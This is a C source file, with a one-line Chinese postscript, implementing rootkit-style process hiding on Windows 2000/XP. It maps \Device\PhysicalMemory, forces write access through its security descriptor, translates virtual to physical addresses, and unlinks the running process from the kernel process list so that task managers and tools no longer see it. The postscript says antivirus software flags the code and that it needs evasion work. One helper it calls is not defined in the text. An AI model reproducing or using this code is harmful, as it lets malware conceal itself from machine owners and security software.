#include<windows.h>
#include<Accctrl.h>
#include<Aclapi.h>

#define NT_SUCCESS(Status)((NTSTATUS)(Status) >= 0)
#define STATUS_INFO_LENGTH_MISMATCH ((NTSTATUS)0xC0000004L)
#define STATUS_ACCESS_DENIED ((NTSTATUS)0xC0000022L)
BOOL HideProcess();
typedef LONG NTSTATUS;
typedef struct _IO_STATUS_BLOCK
{
   NTSTATUS Status;
   ULONG Information;
} IO_STATUS_BLOCK, *PIO_STATUS_BLOCK;

typedef struct _UNICODE_STRING
{
   USHORT Length;
   USHORT MaximumLength;
   PWSTR Buffer;
} UNICODE_STRING, *PUNICODE_STRING;

#define OBJ_INHERIT           0x00000002L
#define OBJ_PERMANENT        0x00000010L
#define OBJ_EXCLUSIVE        0x00000020L
#define OBJ_CASE_INSENSITIVE   0x00000040L
#define OBJ_OPENIF           0x00000080L
#define OBJ_OPENLINK        0x00000100L
#define OBJ_KERNEL_HANDLE      0x00000200L
#define OBJ_VALID_ATTRIBUTES   0x000003F2L

typedef struct _OBJECT_ATTRIBUTES
{
   ULONG Length;
   HANDLE RootDirectory;
   PUNICODE_STRING ObjectName;
   ULONG Attributes;
   PVOID SecurityDescriptor;
   PVOID SecurityQualityOfService;
} OBJECT_ATTRIBUTES, *POBJECT_ATTRIBUTES;

typedef NTSTATUS (CALLBACK* ZWOPENSECTION)(
   OUT PHANDLE SectionHandle,
   IN ACCESS_MASK DesiredAccess,
   IN POBJECT_ATTRIBUTES ObjectAttributes
   );

typedef VOID (CALLBACK* RTLINITUNICODESTRING)(
   IN OUT PUNICODE_STRING DestinationString,
   IN PCWSTR SourceString
   );

RTLINITUNICODESTRING RtlInitUnicodeString;
ZWOPENSECTION ZwOpenSection;
HMODULE g_hNtDLL = NULL;
PVOID g_pMapPhysicalMemory = NULL;
HANDLE g_hMPM = NULL;
OSVERSIONINFO g_osvi;
//---------------------------------------------------------------------------
BOOL InitNTDLL()
{
   g_hNtDLL = LoadLibrary("ntdll.dll");

   if (NULL == g_hNtDLL)
      return FALSE;

   RtlInitUnicodeString = (RTLINITUNICODESTRING)GetProcAddress( g_hNtDLL,

"RtlInitUnicodeString");
   ZwOpenSection = (ZWOPENSECTION)GetProcAddress( g_hNtDLL, "ZwOpenSection");

   return TRUE;
}
//---------------------------------------------------------------------------
VOID CloseNTDLL()
{
   if(NULL != g_hNtDLL)
      FreeLibrary(g_hNtDLL);

   g_hNtDLL = NULL;
}
//---------------------------------------------------------------------------
HANDLE OpenPhysicalMemory()
{
   NTSTATUS status;
   UNICODE_STRING physmemString;
   OBJECT_ATTRIBUTES attributes;
   ULONG PhyDirectory;

   g_osvi.dwOSVersionInfoSize = sizeof(OSVERSIONINFO);
   GetVersionEx (&g_osvi);

   if (5 != g_osvi.dwMajorVersion)
      return NULL;

   switch(g_osvi.dwMinorVersion)
   {
      case 0:
        PhyDirectory = 0x30000;
        break; //2k
      case 1:
        PhyDirectory = 0x39000;
        break; //xp
      default:
        return NULL;
   }

   RtlInitUnicodeString(&physmemString, L"\Device\PhysicalMemory");

   attributes.Length              = sizeof(OBJECT_ATTRIBUTES);
   attributes.RootDirectory        = NULL;
   attributes.ObjectName           = &physmemString;
   attributes.Attributes           = 0;
   attributes.SecurityDescriptor      = NULL;
   attributes.SecurityQualityOfService   = NULL;

   status = ZwOpenSection(&g_hMPM, SECTION_MAP_READ|SECTION_MAP_WRITE, &attributes);

   if(status == STATUS_ACCESS_DENIED)
   {
      status = ZwOpenSection(&g_hMPM, READ_CONTROL|WRITE_DAC, &attributes);
      SetPhyscialMemorySectionCanBeWrited(g_hMPM);
      CloseHandle(g_hMPM);
      status = ZwOpenSection(&g_hMPM, SECTION_MAP_READ|SECTION_MAP_WRITE, &attributes);
   }

   if(!NT_SUCCESS(status))
      return NULL;

   g_pMapPhysicalMemory = MapViewOfFile(g_hMPM, FILE_MAP_READ|FILE_MAP_WRITE, 0, PhyDirectory,

0x1000);

   if( g_pMapPhysicalMemory == NULL )
      return NULL;

   return g_hMPM;
}
//---------------------------------------------------------------------------
PVOID LinearToPhys(PULONG BaseAddress, PVOID addr)
{
   ULONG VAddr = (ULONG)addr,PGDE,PTE,PAddr;
   PGDE = BaseAddress[VAddr>>22];

   if (0 == (PGDE&1))
      return 0;

   ULONG tmp = PGDE & 0x00000080;

   if (0 != tmp)
   {
      PAddr = (PGDE & 0xFFC00000) + (VAddr & 0x003FFFFF);
   }
   else
   {
      PGDE = (ULONG)MapViewOfFile(g_hMPM, 4, 0, PGDE & 0xfffff000, 0x1000);
      PTE = ((PULONG)PGDE)[(VAddr&0x003FF000)>>12];

      if (0 == (PTE&1))
        return 0;

      PAddr=(PTE&0xFFFFF000)+(VAddr&0x00000FFF);
      UnmapViewOfFile((PVOID)PGDE);
   }

   return (PVOID)PAddr;
}
//---------------------------------------------------------------------------
ULONG GetData(PVOID addr)
{
   ULONG phys = (ULONG)LinearToPhys((PULONG)g_pMapPhysicalMemory, (PVOID)addr);
   PULONG tmp = (PULONG)MapViewOfFile(g_hMPM, FILE_MAP_READ|FILE_MAP_WRITE, 0, phys &

0xfffff000, 0x1000);

   if (0 == tmp)
      return 0;

   ULONG ret = tmp[(phys & 0xFFF)>>2];
   UnmapViewOfFile(tmp);

   return ret;
}
//---------------------------------------------------------------------------
BOOL SetData(PVOID addr,ULONG data)
{
   ULONG phys = (ULONG)LinearToPhys((PULONG)g_pMapPhysicalMemory, (PVOID)addr);
   PULONG tmp = (PULONG)MapViewOfFile(g_hMPM, FILE_MAP_WRITE, 0, phys & 0xfffff000, 0x1000);

   if (0 == tmp)
      return FALSE;

   tmp[(phys & 0xFFF)>>2] = data;
   UnmapViewOfFile(tmp);

   return TRUE;
}
//---------------------------------------------------------------------------
long __stdcall exeception(struct _EXCEPTION_POINTERS *tmp)
{
  ExitProcess(0);
  return 1 ;
}
//---------------------------------------------------------------------------
BOOL YHideProcess()
{
//   SetUnhandledExceptionFilter(exeception);

   if (FALSE == InitNTDLL())
      return FALSE;

   if (0 == OpenPhysicalMemory())
      return FALSE;

   ULONG thread  = GetData((PVOID)0xFFDFF124); //kteb
   ULONG process = GetData(PVOID(thread + 0x44)); //kpeb

   ULONG fw, bw;
   if (0 == g_osvi.dwMinorVersion)
   {
      fw = GetData(PVOID(process + 0xa0));
      bw = GetData(PVOID(process + 0xa4));      
   }

   if (1 == g_osvi.dwMinorVersion)
   {
      fw = GetData(PVOID(process + 0x88));
      bw = GetData(PVOID(process + 0x8c));
   }

   SetData(PVOID(fw + 4), bw);
   SetData(PVOID(bw), fw);

   CloseHandle(g_hMPM);
   CloseNTDLL();

   return TRUE;
}

BOOL HideProcess()
{
static BOOL b_hide = false;
if (!b_hide)
{
  b_hide = true;
  YHideProcess();
  return true;
}
return true;
}

ps.多数杀毒会告警，需要免杀